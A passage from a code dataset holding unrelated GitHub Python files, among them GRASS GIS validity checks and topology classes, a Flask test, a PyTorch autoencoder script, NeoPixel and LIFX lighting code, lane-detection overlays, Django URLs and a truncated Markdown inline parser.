investigation).\n ``none_for_no_reason=True`` allows the function to be used as part of other\n diagnostic. When this function fails to find reason for invalidity, other\n the caller can continue the investigation in their context.\n\n :param database: Path to GRASS GIS database directory\n :param location: name of a Location\n :param none_for_no_reason: When True, return None when reason is unknown\n :returns: translated message or None\n \"\"\"\n location_path = os.path.join(database, location)\n permanent_path = os.path.join(location_path, \"PERMANENT\")\n\n # directory\n if not os.path.exists(location_path):\n return _(\"Location <%s> doesn't exist\") % location_path\n # permanent mapset\n if \"PERMANENT\" not in os.listdir(location_path):\n return (\n _(\n \"<%s> is not a valid GRASS Location\"\n \" because PERMANENT Mapset is missing\"\n )\n % location_path\n )\n if not os.path.isdir(permanent_path):\n return (\n _(\n \"<%s> is not a valid GRASS Location\"\n \" because PERMANENT is not a directory\"\n )\n % location_path\n )\n # partially based on the is_location_valid() function\n if not os.path.isfile(os.path.join(permanent_path, \"DEFAULT_WIND\")):\n return (\n _(\n \"<%s> is not a valid GRASS Location\"\n \" because PERMANENT Mapset does not have a DEFAULT_WIND file\"\n \" (default computational region)\"\n )\n % location_path\n )\n # no reason for invalidity found (might be valid)\n if none_for_no_reason:\n return None\n return _(\"Location <{location_path}> is invalid for an unknown reason\").format(\n location_path=location_path\n )\n\n\ndef get_location_invalid_suggestion(database, location):\n \"\"\"Return suggestion what to do when specified location is not valid\n\n It gives suggestion when:\n * A mapset was specified instead of a location.\n * A GRASS database was specified instead of a location.\n \"\"\"\n location_path = os.path.join(database, location)\n # a common error is to use mapset instead of location,\n # if that's the case, include that info into the message\n if is_mapset_valid(location_path):\n return _(\n \"<{location}> looks like a mapset, not a location.\"\n \" Did you mean just <{one_dir_up}>?\"\n ).format(location=location, one_dir_up=database)\n # confusion about what is database and what is location\n if dir_contains_location(location_path):\n return _(\n \"It looks like <{location}> contains locations.\"\n \" Did you mean to specify one of them?\"\n ).format(location=location)\n return None\n\n\ndef get_mapset_name_invalid_reason(database, location, mapset_name):\n \"\"\"Get reasons why mapset name is not valid.\n\n It gets reasons when:\n * Name is not valid.\n * Name is reserved for OGR layers.\n * Mapset in the same path already exists.\n\n Returns message as string if there was a reason, otherwise None.\n \"\"\"\n message = None\n mapset_path = os.path.join(database, location, mapset_name)\n\n # Check if mapset name is valid\n if not gs.legal_name(mapset_name):\n message = _(\n \"Name '{}' is not a valid name for location or mapset. \"\n \"Please use only ASCII characters excluding characters {} \"\n \"and space.\"\n ).format(mapset_name, \"/\\\"'@,=*~\")\n # Check reserved mapset name\n elif mapset_name.lower() == \"ogr\":\n message = _(\n \"Name '{}' is reserved for direct \"\n \"read access to OGR layers. Please use \"\n \"another name for your mapset.\"\n ).format(mapset_name)\n # Check whether mapset exists\n elif mapset_exists(database, location, mapset_name):\n message = _(\n \"Mapset <{mapset}> already exists. Please consider using \"\n \"another name for your mapset.\"\n ).format(mapset=mapset_path)\n\n return message\n\n\ndef get_location_name_invalid_reason(grassdb, location_name):\n \"\"\"Get reasons why location name is not valid.\n\n It gets reasons when:\n * Name is not valid.\n * Location in the same path already exists.\n\n Returns message as string if there was a reason, otherwise None.\n \"\"\"\n message = None\n location_path = os.path.join(grassdb, location_name)\n\n # Check if mapset name is valid\n if not gs.legal_name(location_name):\n message = _(\n \"Name '{}' is not a valid name for location or mapset. \"\n \"Please use only ASCII characters excluding characters {} \"\n \"and space.\"\n ).format(location_name, \"/\\\"'@,=*~\")\n # Check whether location exists\n elif location_exists(grassdb, location_name):\n message = _(\n \"Location <{location}> already exists. Please consider using \"\n \"another name for your location.\"\n ).format(location=location_path)\n\n return message\n\n\ndef is_mapset_name_valid(database, location, mapset_name):\n \"\"\"Check if mapset name is valid.\n\n Returns True if mapset name is valid, otherwise False.\n \"\"\"\n return (\n gs.legal_name(mapset_name)\n and mapset_name.lower() != \"ogr\"\n and not mapset_exists(database, location, mapset_name)\n )\n\n\ndef is_location_name_valid(database, location_name):\n \"\"\"Check if location name is valid.\n\n Returns True if location name is valid, otherwise False.\n \"\"\"\n return gs.legal_name(location_name) and not location_exists(database, location_name)\n\n\ndef get_reasons_mapsets_not_removable(mapsets, check_permanent):\n \"\"\"Get reasons why mapsets cannot be removed.\n\n Parameter *mapsets* is a list of tuples (database, location, mapset).\n Parameter *check_permanent* is True of False. It depends on whether\n we want to check for permanent mapset or not.\n\n Returns messages as list if there were any failed checks, otherwise empty list.\n \"\"\"\n messages = []\n for grassdb, location, mapset in mapsets:\n message = get_reason_mapset_not_removable(\n grassdb, location, mapset, check_permanent\n )\n if message:\n messages.append(message)\n return messages\n\n\ndef get_reason_mapset_not_removable(grassdb, location, mapset, check_permanent):\n \"\"\"Get reason why one mapset cannot be removed.\n\n Parameter *check_permanent* is True of False. It depends on whether\n we want to check for permanent mapset or not.\n\n Returns message as string if there was failed check, otherwise None.\n \"\"\"\n message = None\n mapset_path = os.path.join(grassdb, location, mapset)\n\n # Check if mapset is permanent\n if check_permanent and mapset == \"PERMANENT\":\n message = _(\"Mapset <{mapset}> is required for a valid location.\").format(\n mapset=mapset_path\n )\n # Check if mapset is current\n elif is_mapset_current(grassdb, location, mapset):\n message = _(\"Mapset <{mapset}> is the current mapset.\").format(\n mapset=mapset_path\n )\n # Check whether mapset is in use\n elif is_mapset_locked(mapset_path):\n message = _(\"Mapset <{mapset}> is in use.\").format(mapset=mapset_path)\n # Check whether mapset is owned by different user\n elif is_different_mapset_owner(mapset_path):\n message = _(\"Mapset <{mapset}> is owned by a different user.\").format(\n mapset=mapset_path\n )\n\n return message\n\n\ndef get_reasons_locations_not_removable(locations):\n \"\"\"Get reasons why locations cannot be removed.\n\n Parameter *locations* is a list of tuples (database, location).\n\n Returns messages as list if there were any failed checks, otherwise empty list.\n \"\"\"\n messages = []\n for grassdb, location in locations:\n messages += get_reasons_location_not_removable(grassdb, location)\n return messages\n\n\ndef get_reasons_location_not_removable(grassdb, location):\n \"\"\"Get reasons why one location cannot be removed.\n\n Returns messages as list if there were any failed checks, otherwise empty list.\n \"\"\"\n messages = []\n location_path = os.path.join(grassdb, location)\n\n # Check if location is current\n if is_location_current(grassdb, location):\n messages.append(\n _(\"Location <{location}> is the current location.\").format(\n location=location_path\n )\n )\n return messages\n\n # Find mapsets in particular location\n tmp_gisrc_file, env = gs.create_environment(grassdb, location, \"PERMANENT\")\n env[\"GRASS_SKIP_MAPSET_OWNER_CHECK\"] = \"1\"\n\n g_mapsets = (\n gs.read_command(\"g.mapsets\", flags=\"l\", separator=\"comma\", quiet=True, env=env)\n .strip()\n .split(\",\")\n )\n\n # Append to the list of tuples\n mapsets = []\n for g_mapset in g_mapsets:\n mapsets.append((grassdb, location, g_mapset))\n\n # Concentenate both checks\n messages += get_reasons_mapsets_not_removable(mapsets, check_permanent=False)\n\n gs.try_remove(tmp_gisrc_file)\n return messages\n\n\ndef get_reasons_grassdb_not_removable(grassdb):\n \"\"\"Get reasons why one grassdb cannot be removed.\n\n Returns messages as list if there were any failed checks, otherwise empty list.\n \"\"\"\n messages = []\n genv = gisenv()\n\n # Check if grassdb is current\n if grassdb == genv[\"GISDBASE\"]:\n messages.append(\n _(\"GRASS database <{grassdb}> is the current database.\").format(\n grassdb=grassdb\n )\n )\n return messages\n\n g_locations = get_list_of_locations(grassdb)\n\n # Append to the list of tuples\n locations = []\n for g_location in g_locations:\n locations.append((grassdb, g_location))\n messages = get_reasons_locations_not_removable(locations)\n\n return messages\n\n\ndef get_list_of_locations(dbase):\n \"\"\"Get list of GRASS locations in given dbase\n\n :param dbase: GRASS database path\n\n :return: list of locations (sorted)\n \"\"\"\n locations = list()\n for location in glob.glob(os.path.join(dbase, \"*\")):\n if os.path.join(location, \"PERMANENT\") in glob.glob(\n os.path.join(location, \"*\")\n ):\n locations.append(os.path.basename(location))\n\n locations.sort(key=lambda x: x.lower())\n\n return locations\n","repo_name":"OSGeo/grass","sub_path":"python/grass/grassdb/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":21580,"program_lang":"python","lang":"en","doc_type":"code","stars":687,"dataset":"github-code","pt":"19"} +{"seq_id":"70812961644","text":"import sqlite3\n\nimport pytest\nfrom ..flask_pet_project.dbase import get_db\n\n\ndef test_get_close_dbase(app):\n with app.app_context():\n # Checking if the data bases return the same connection each time\n db = get_db()\n assert db is get_db()\n\n # Call correspond error during sql-request (u can't connect to db because it was closed earlier)\n with pytest.raises(sqlite3.ProgrammingError) as e:\n db.execute('SELECT 1')\n # Get access to the information about raised error\n assert 'closed' in str(e.value)\n\n","repo_name":"galinapivovarnik/Flask_small_project","sub_path":"Test_for_app/test_dbase.py","file_name":"test_dbase.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28348812763","text":"# imports\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom custom_dataset import MyDataset\nfrom custom_autoencoder import AutoEncoder\n\nnum_epochs = 100\nbatch_size = 12\nlearning_rate = 1e-3\nlatent_size = 64\nPATH = \"facade_ae.pth\"\n\ndata_transforms = {\n 'train': transforms.Compose([\n transforms.ToTensor()\n ]),\n 'test': transforms.Compose([\n transforms.ToTensor()\n ])\n}\n\ndata_dir = 'data_ae'\nimage_datasets = {x: MyDataset(x + '.csv', os.path.join(data_dir, x), data_transforms[x]) for x in ['train']}\ndataset_loaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle=True, num_workers=8)\n for x in ['train']}\ndataset_sizes = {x: len(image_datasets[x]) for x in ['train']}\nprint(dataset_sizes)\n\n# GPU mode\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nmodel = AutoEncoder(in_channels=1, dec_channels=16, latent_size=latent_size)\ncriterion = nn.MSELoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\nfrom torch.utils.tensorboard import SummaryWriter\n\n# default `log_dir` is \"runs\" - we'll be more specific here\nwriter = SummaryWriter('runs/facade_experiment')\n\n# get some random training images\ndataiter = iter(dataset_loaders['train'])\nsample = dataiter.next()\nimg_1 = sample['input_1']\nimg_2 = sample['input_2']\nimages_gt = sample['input_gt']\n\nwriter.add_graph(model, (img_1, img_2))\nwriter.close()","repo_name":"xwzhangcs/facades_fuse","sub_path":"custom_tensorb.py","file_name":"custom_tensorb.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38174040447","text":"\"\"\"\nSpatial topology connector class\n\nUsage:\n\n>>> import grass.temporal as tgis\n>>> tmr = tgis.SpatialTopologyDatasetConnector()\n\n(C) 2012-2013 by the GRASS Development Team\nThis program is free software under the GNU General Public\nLicense (>=v2). Read the file COPYING that comes with GRASS\nfor details.\n\n:authors: Soeren Gebbert\n\"\"\"\nimport copy\n\n\nclass SpatialTopologyDatasetConnector(object):\n \"\"\"This class implements a spatial topology access structure to connect\n spatial related datasets\n\n This object will be set up by spatial topology creation method provided\n by the SpatioTemporalTopologyBuilder.\n\n The following spatial relations with access methods are supported:\n\n - equivalent\n - overlap\n - in\n - contain\n - meet\n - cover\n - covered\n\n Usage:\n\n .. code-block:: python\n\n >>> import grass.temporal as tgis\n >>> tgis.init()\n >>> map = tgis.RasterDataset(\"a@P\")\n >>> tmr = tgis.SpatialTopologyDatasetConnector()\n >>> tmr.append_equivalent(map)\n >>> tmr.append_overlap(map)\n >>> tmr.append_in(map)\n >>> tmr.append_contain(map)\n >>> tmr.append_meet(map)\n >>> tmr.append_cover(map)\n >>> tmr.append_covered(map)\n >>> tmr.print_spatial_topology_info()\n +-------------------- Spatial Topology --------------------------------------+\n | Equivalent: ................ a@P\n | Cover: ..................... a@P\n | Covered: ................... a@P\n | Overlap: ................... a@P\n | In: ........................ a@P\n | Contain: ................... a@P\n | Meet: ...................... a@P\n >>> tmr.print_spatial_topology_shell_info()\n equivalent=a@P\n cover=a@P\n covered=a@P\n overlap=a@P\n in=a@P\n contain=a@P\n meet=a@P\n >>> rlist = tmr.get_spatial_relations()\n >>> if \"COVER\" in rlist.keys():\n ... print(rlist[\"COVER\"][0].get_id())\n a@P\n\n \"\"\"\n\n def __init__(self):\n self.reset_spatial_topology()\n\n def reset_spatial_topology(self):\n \"\"\"Reset any information about temporal topology\"\"\"\n self._spatial_topology = {}\n self._has_spatial_topology = False\n\n def get_spatial_relations(self):\n \"\"\"Return the dictionary of spatial relationships\n\n Keys are the spatial relationships in upper case,\n values are abstract map objects.\n\n :return: The spatial relations dictionary\n \"\"\"\n return copy.copy(self._spatial_topology)\n\n def get_number_of_spatial_relations(self):\n \"\"\"Return a dictionary in which the keys are the relation names and the value\n are the number of relations.\n\n The following relations are available:\n\n - equivalent\n - overlap\n - in\n - contain\n - meet\n - cover\n - covered\n\n To access topological information the spatial topology must be\n build first using the SpatialTopologyBuilder.\n\n :return: the dictionary with relations as keys and number as\n values or None in case the topology wasn't build\n \"\"\"\n if self._has_spatial_topology is False:\n return None\n\n relations = {}\n try:\n relations[\"equivalent\"] = len(self._spatial_topology[\"EQUIVALENT\"])\n except:\n relations[\"equivalent\"] = 0\n try:\n relations[\"overlap\"] = len(self._spatial_topology[\"OVERLAP\"])\n except:\n relations[\"overlap\"] = 0\n try:\n relations[\"in\"] = len(self._spatial_topology[\"IN\"])\n except:\n relations[\"in\"] = 0\n try:\n relations[\"contain\"] = len(self._spatial_topology[\"CONTAIN\"])\n except:\n relations[\"contain\"] = 0\n try:\n relations[\"meet\"] = len(self._spatial_topology[\"MEET\"])\n except:\n relations[\"meet\"] = 0\n try:\n relations[\"cover\"] = len(self._spatial_topology[\"COVER\"])\n except:\n relations[\"cover\"] = 0\n try:\n relations[\"covered\"] = len(self._spatial_topology[\"COVERED\"])\n except:\n relations[\"covered\"] = 0\n\n return relations\n\n def set_spatial_topology_build_true(self):\n \"\"\"Same as name\"\"\"\n self._has_spatial_topology = True\n\n def set_spatial_topology_build_false(self):\n \"\"\"Same as name\"\"\"\n self._has_spatial_topology = False\n\n def is_spatial_topology_build(self):\n \"\"\"Check if the temporal topology was build\"\"\"\n return self._has_spatial_topology\n\n def append_equivalent(self, map):\n \"\"\"Append a map with equivalent spatial extent as this map\n\n :param map: This object should be of type AbstractMapDataset\n or derived classes\n \"\"\"\n if \"EQUIVALENT\" not in self._spatial_topology:\n self._spatial_topology[\"EQUIVALENT\"] = []\n self._spatial_topology[\"EQUIVALENT\"].append(map)\n\n def get_equivalent(self):\n \"\"\"Return a list of map objects with equivalent spatial extent as this map\n\n :return: A list of map objects or None\n \"\"\"\n if \"EQUIVALENT\" not in self._spatial_topology:\n return None\n return self._spatial_topology[\"EQUIVALENT\"]\n\n def append_overlap(self, map):\n \"\"\"Append a map that this spatial overlap with this map\n\n :param map: This object should be of type AbstractMapDataset\n or derived classes\n \"\"\"\n if \"OVERLAP\" not in self._spatial_topology:\n self._spatial_topology[\"OVERLAP\"] = []\n self._spatial_topology[\"OVERLAP\"].append(map)\n\n def get_overlap(self):\n \"\"\"Return a list of map objects that this map spatial overlap with\n\n :return: A list of map objects or None\n \"\"\"\n if \"OVERLAP\" not in self._spatial_topology:\n return None\n return self._spatial_topology[\"OVERLAP\"]\n\n def append_in(self, map):\n \"\"\"Append a map that this is spatial in this map\n\n :param map: This object should be of type AbstractMapDataset\n or derived classes\n \"\"\"\n if \"IN\" not in self._spatial_topology:\n self._spatial_topology[\"IN\"] = []\n self._spatial_topology[\"IN\"].append(map)\n\n def get_in(self):\n \"\"\"Return a list of map objects that are spatial in this map\n\n :return: A list of map objects or None\n \"\"\"\n if \"IN\" not in self._spatial_topology:\n return None\n return self._spatial_topology[\"IN\"]\n\n def append_contain(self, map):\n \"\"\"Append a map that this map spatially contains\n\n :param map: This object should be of type AbstractMapDataset\n or derived classes\n \"\"\"\n if \"CONTAIN\" not in self._spatial_topology:\n self._spatial_topology[\"CONTAIN\"] = []\n self._spatial_topology[\"CONTAIN\"].append(map)\n\n def get_contain(self):\n \"\"\"Return a list of map objects that this map contains\n\n :return: A list of map objects or None\n \"\"\"\n if \"CONTAIN\" not in self._spatial_topology:\n return None\n return self._spatial_topology[\"CONTAIN\"]\n\n def append_meet(self, map):\n \"\"\"Append a map that spatially meet with this map\n\n :param map: This object should be of type AbstractMapDataset\n or derived classes\n \"\"\"\n if \"MEET\" not in self._spatial_topology:\n self._spatial_topology[\"MEET\"] = []\n self._spatial_topology[\"MEET\"].append(map)\n\n def get_meet(self):\n \"\"\"Return a list of map objects that spatially meet with this map\n\n :return: A list of map objects or None\n \"\"\"\n if \"MEET\" not in self._spatial_topology:\n return None\n return self._spatial_topology[\"MEET\"]\n\n def append_cover(self, map):\n \"\"\"Append a map that spatially cover this map\n\n :param map: This object should be of type AbstractMapDataset\n or derived classes\n \"\"\"\n if \"COVER\" not in self._spatial_topology:\n self._spatial_topology[\"COVER\"] = []\n self._spatial_topology[\"COVER\"].append(map)\n\n def get_cover(self):\n \"\"\"Return a list of map objects that spatially cover this map\n\n :return: A list of map objects or None\n \"\"\"\n if \"COVER\" not in self._spatial_topology:\n return None\n return self._spatial_topology[\"COVER\"]\n\n def append_covered(self, map):\n \"\"\"Append a map that is spatially covered by this map\n\n :param map: This object should be of type AbstractMapDataset\n or derived classes\n \"\"\"\n if \"COVERED\" not in self._spatial_topology:\n self._spatial_topology[\"COVERED\"] = []\n self._spatial_topology[\"COVERED\"].append(map)\n\n def get_covered(self):\n \"\"\"Return a list of map objects that are spatially covered by this map\n\n :return: A list of map objects or None\n \"\"\"\n if \"COVERED\" not in self._spatial_topology:\n return None\n return self._spatial_topology[\"COVERED\"]\n\n def _generate_map_list_string(self, map_list, line_wrap=True):\n count = 0\n string = \"\"\n for map_ in map_list:\n if line_wrap and count > 0 and count % 3 == 0:\n string += \"\\n | ............................ \"\n count = 0\n if count == 0:\n string += map_.get_id()\n else:\n string += \",%s\" % map_.get_id()\n count += 1\n\n return string\n\n # Set the properties\n equivalent = property(fget=get_equivalent, fset=append_equivalent)\n cover = property(fget=get_cover, fset=append_cover)\n covered = property(fget=get_covered, fset=append_covered)\n overlap = property(fget=get_overlap, fset=append_overlap)\n in_ = property(fget=get_in, fset=append_in)\n contain = property(fget=get_contain, fset=append_contain)\n meet = property(fget=get_meet, fset=append_meet)\n\n def print_spatial_topology_info(self):\n \"\"\"Print information about this class in human readable style\"\"\"\n\n print(\n \" +-------------------- Spatial Topology --------------------------------------+\"\n )\n # 0123456789012345678901234567890\n if self.equivalent is not None:\n print(\n \" | Equivalent: ................ \"\n + self._generate_map_list_string(self.equivalent)\n )\n if self.cover is not None:\n print(\n \" | Cover: ..................... \"\n + self._generate_map_list_string(self.cover)\n )\n if self.covered is not None:\n print(\n \" | Covered: ................... \"\n + self._generate_map_list_string(self.covered)\n )\n if self.overlap is not None:\n print(\n \" | Overlap: ................... \"\n + self._generate_map_list_string(self.overlap)\n )\n if self.in_ is not None:\n print(\n \" | In: ........................ \"\n + self._generate_map_list_string(self.in_)\n )\n if self.contain is not None:\n print(\n \" | Contain: ................... \"\n + self._generate_map_list_string(self.contain)\n )\n if self.meet is not None:\n print(\n \" | Meet: ...................... \"\n + self._generate_map_list_string(self.meet)\n )\n\n def print_spatial_topology_shell_info(self):\n \"\"\"Print information about this class in shell style\"\"\"\n\n if self.equivalent is not None:\n print(\n \"equivalent=\" + self._generate_map_list_string(self.equivalent, False)\n )\n if self.cover is not None:\n print(\"cover=\" + self._generate_map_list_string(self.cover, False))\n if self.covered is not None:\n print(\"covered=\" + self._generate_map_list_string(self.covered, False))\n if self.overlap is not None:\n print(\"overlap=\" + self._generate_map_list_string(self.overlap))\n if self.in_ is not None:\n print(\"in=\" + self._generate_map_list_string(self.in_))\n if self.contain is not None:\n print(\"contain=\" + self._generate_map_list_string(self.contain))\n if self.meet is not None:\n print(\"meet=\" + self._generate_map_list_string(self.meet))\n\n\n###############################################################################\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n","repo_name":"OSGeo/grass","sub_path":"python/grass/temporal/spatial_topology_dataset_connector.py","file_name":"spatial_topology_dataset_connector.py","file_ext":"py","file_size_in_byte":12811,"program_lang":"python","lang":"en","doc_type":"code","stars":687,"dataset":"github-code","pt":"19"} +{"seq_id":"72184167723","text":"import board\nimport time\nimport neopixel\n\npixel_pin = board.A2\nnum_pixels = 8\n\npixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.05, auto_write=False)\n\nRED = (255, 0, 0)\nORANGE = (255, 128, 0)\nYELLOW = (255, 255, 0)\nGREEN = (0, 255, 0)\nCYAN = (0, 255, 255)\nBLUE = (0, 0, 255)\nPURPLE = (180, 0, 255)\nWHITE = (255, 255, 255)\n\nwhile True:\n pixels.fill(PURPLE)\n pixels.show()\n time.sleep(1)\n","repo_name":"knrdsps/spj_circuitpython","sub_path":"lesson4_neopixel_single_colour.py","file_name":"lesson4_neopixel_single_colour.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13305246075","text":"from PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom detect import detect_lane_lines\nfrom distortion import Distortion\nfrom image_helper import rgb_image\nfrom birdseye import BirdsEyeView\nfrom lane import Lane\nimport cv2\nimport glob\nimport numpy as np\nimport combined_thresholds\nimport matplotlib.pyplot as plt\n\ndef overlay_text(image, text, pos=(0, 0), color=(255, 255, 255)):\n image = Image.fromarray(image)\n draw = ImageDraw.Draw(image)\n font = ImageFont.truetype(\"./fonts/LucidaBrightRegular.ttf\", 64)\n draw.text(pos, text, color, font=font)\n image = np.asarray(image)\n\n return image\n\ndef overlay_lane(image, left_fit, right_fit, birdseye):\n left_ys = np.linspace(0, 100, num=101) * 7.2\n left_xs = left_fit[0]*left_ys**2 + left_fit[1]*left_ys + left_fit[2]\n\n right_ys = np.linspace(0, 100, num=101) * 7.2\n right_xs = right_fit[0]*right_ys**2 + right_fit[1]*right_ys + right_fit[2]\n\n color_warp = np.zeros_like(image).astype(np.uint8)\n\n pts_left = np.array([np.transpose(np.vstack([left_xs, left_ys]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_xs, right_ys])))])\n pts = np.hstack((pts_left, pts_right))\n\n cv2.fillPoly(color_warp, np.int_([pts]), (0, 0, 255))\n newwarp = cv2.warpPerspective(color_warp, birdseye.inverse_transform_matrix(), (image.shape[1], image.shape[0]))\n newwarp = birdseye.transform_from_birdseye(color_warp, image)\n\n return cv2.addWeighted(image, 1, newwarp, 0.3, 0)\n\ndef overlay_detected_lane_data(image, lanes, birdseye):\n height, width, _ = image.shape\n\n image = overlay_lane(image, lanes.left.pixels.fit, lanes.right.pixels.fit, birdseye)\n image = overlay_text(image, \"Left curvature: {0:.2f}m\".format(lanes.left.meters.curvature(height)), pos=(10, 10))\n image = overlay_text(image, \"Right curvature: {0:.2f}m\".format(lanes.right.meters.curvature(height)), pos=(10, 90))\n image = overlay_text(image, \"Vehicle offset: {0:.2f}m\".format(lanes.distance_from_center((width/2, height))), pos=(10, 170))\n\n return image\n\nclass OverlayDetectedLaneData:\n def __init__(self, birdseye):\n self.birdseye = birdseye\n\n def draw_overlays(self, image, lanes):\n return overlay_detected_lane_data(\n image=image,\n lanes=lanes,\n birdseye=self.birdseye)\n\nif __name__ == \"__main__\":\n np.seterr(all='ignore')\n\n birdseye = BirdsEyeView()\n distortion = Distortion(calibration_data_filepath=\"./camera_cal/wide_dist_pickle.p\")\n overlay = OverlayDetectedLaneData(birdseye=birdseye)\n\n images_glob = glob.glob(\"./test_images/test1.jpg\")\n\n for filepath in images_glob:\n image = rgb_image(filepath)\n bin_image = distortion.undistort(image)\n bin_image = birdseye.transform_to_birdseye(bin_image)\n bin_image, gb = combined_thresholds.pipeline(bin_image)\n\n lanes, _ = detect_lane_lines(bin_image)\n output_image = overlay.draw_overlays(image, lanes)\n\n plt.imshow(output_image)\n plt.show()\n","repo_name":"matttpj/CarND-Advanced-Lane-Lines","sub_path":"overlay.py","file_name":"overlay.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8134033120","text":"import random\nfrom lifxlan import Light, BLUE, RED\n\nkelvin = 4500\ntransition_time = 3000\n\nclass Light(Light):\n\n ##\n # flame effect when drawing above max power from the grid\n def flame_on(self):\n print('flame_on')\n self.set_color(RED, transition_time)\n\n ##\n # blizzard effect when feeding in above max power to the grid\n def blizzard(self):\n print('snap_freeze')\n self.set_color(BLUE, transition_time)\n\n ##\n # hot colours, for when you're drawing power from the grid\n # intensity - number between 0 - 100 indicating how much power\n # the house is drawing from the grid\n # magnitude - number beween 0 - 100 indicating the total amount\n # of power the house is using, grid + solar\n def set_heat(self, intensity, magnitude):\n print(f\"set_heat {intensity} : {magnitude}\")\n start_hue = 64 # yellow\n end_hue = 0 # red\n\n hue = ((start_hue - (intensity * (start_hue/100)))/360) * 65535\n saturation = 65535\n brightness = 65535 * (magnitude/100)\n colour = [hue, saturation, brightness, kelvin]\n print(colour)\n self.set_color(colour, transition_time)\n # yellow - orange - red - flames!\n # hue 64 -- 0\n\n def set_cool(self, intensity, magnitude):\n print(f\"set_cool {intensity} : {magnitude}\")\n start_hue = 128 # green\n end_hue = 256 # blue\n\n hue = ((start_hue + (intensity * (end_hue - start_hue)/100))/360) * 65535\n saturation = 65535\n brightness = 65535 * (magnitude/100)\n colour = [hue, saturation, brightness, kelvin]\n print(colour)\n self.set_color(colour, transition_time)\n # green - cyan - blue - purple/blue\n # hue 128 -- 256\n\n def set_white(self, magnitude):\n print(f\"set white {magnitude}\")\n\n brightness = 65535 * (magnitude/100)\n colour = [58275, 0, brightness, kelvin]\n self.set_color(colour, transition_time)\n","repo_name":"shabadoo75/solar_monitor_globe","sub_path":"lifxpwrmtr.py","file_name":"lifxpwrmtr.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10844850947","text":"from django.urls import path\nfrom app2.views import *\nfrom django.contrib.auth.views import LogoutView\n\nurlpatterns = [\n path('accounts/signup/', register_account, name=\"REGISTER\"),\n path('accounts/login/', login_account, name=\"LOGIN\"),\n path('login_exitoso/', succesful_login, name=\"SUCCESFUL_LOGIN\"),\n path('logout/', LogoutView.as_view(template_name=\"app2/log-out.html\"), name=\"LOGOUT\"),\n path('accounts/profile/', profile, name=\"PROFILE\"),\n path('accounts/profile2/', profile2, name=\"PROFILE2\")\n]\n","repo_name":"Ignacio-Serda/Proyecto-Final---Serda_Barrientos","sub_path":"app2/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"42903246061","text":"import re\nimport unicodedata\nfrom typing import Any\n\nfrom docutils import nodes\nfrom docutils.nodes import Element, Text\n\nfrom pycmark import addnodes\nfrom pycmark.inlineparser import PatternInlineProcessor, UnmatchedTokenError, backtrack_onerror\nfrom pycmark.readers import TextReader\nfrom pycmark.utils import entitytrans, normalize_uri\nfrom pycmark.utils import OPENTAG, CLOSETAG, escaped_chars_pattern\n\n\ndef is_punctuation(char: str) -> bool:\n return 'P' in unicodedata.category(char)\n\n\n# 6.1 Backslash escapes\nclass BackslashEscapeProcessor(PatternInlineProcessor):\n pattern = escaped_chars_pattern\n\n def run(self, reader: TextReader, document: Element) -> bool:\n document += addnodes.SparseText(reader.subject, reader.position + 1, reader.position + 2)\n reader.step(2)\n return True\n\n\n# 6.2 Entity and numeric character references\nclass EntityReferenceProcessor(PatternInlineProcessor):\n pattern = re.compile(r'&(?:\\w{1,32}|#\\d{1,7}|#[xX][0-9A-Fa-f]{1,6});')\n\n def run(self, reader: TextReader, document: Element) -> bool:\n text = reader.consume(self.pattern).group(0)\n document += Text(entitytrans._unescape(text))\n return True\n\n\n# 6.3 Code spans\nclass CodeSpanProcessor(PatternInlineProcessor):\n pattern = re.compile(r'`+')\n\n @backtrack_onerror\n def run(self, reader: TextReader, document: Element) -> bool:\n marker = reader.consume(self.pattern).group(0)\n\n pattern = re.compile(marker + r\"([^`]|$)\")\n text = addnodes.SparseText(reader.remain, 0, 0)\n while reader.remain:\n if pattern.match(reader.remain):\n code = re.sub(r'[\\r\\n]', ' ', str(text), re.S)\n code = self.trim_single_space(code)\n document += nodes.literal(code, code)\n reader.step(len(marker))\n return True\n elif reader.remain[0] == '`':\n while reader.remain and reader.remain[0] == '`':\n text.spread(end=1)\n reader.step()\n else:\n text.spread(end=1)\n reader.step()\n else:\n raise UnmatchedTokenError(marker)\n\n def trim_single_space(self, s: str) -> str:\n return re.sub('^ (.+) $', r'\\1', s)\n\n\n# 6.4 Emphasis and strong emphasis\nclass EmphasisProcessor(PatternInlineProcessor):\n pattern = re.compile(r'(\\*+|_+)')\n whitespaces = re.compile(r'\\s|0xa0')\n\n def run(self, reader: TextReader, document: Element) -> bool:\n if reader.position == 0:\n before_is_whitespace: Any = True\n before_is_punctuation: Any = False\n else:\n before = reader[reader.position - 1]\n before_is_whitespace = self.whitespaces.match(before)\n before_is_punctuation = is_punctuation(before)\n\n marker = reader.consume(self.pattern).group(0)\n\n if reader.remain:\n after = reader.remain[0]\n after_is_whitespace: Any = self.whitespaces.match(after)\n after_is_punctuation: Any = is_punctuation(after)\n else:\n after_is_whitespace = True\n after_is_punctuation = False\n\n left_flanking = (not after_is_whitespace and\n (not after_is_punctuation or\n before_is_whitespace or\n 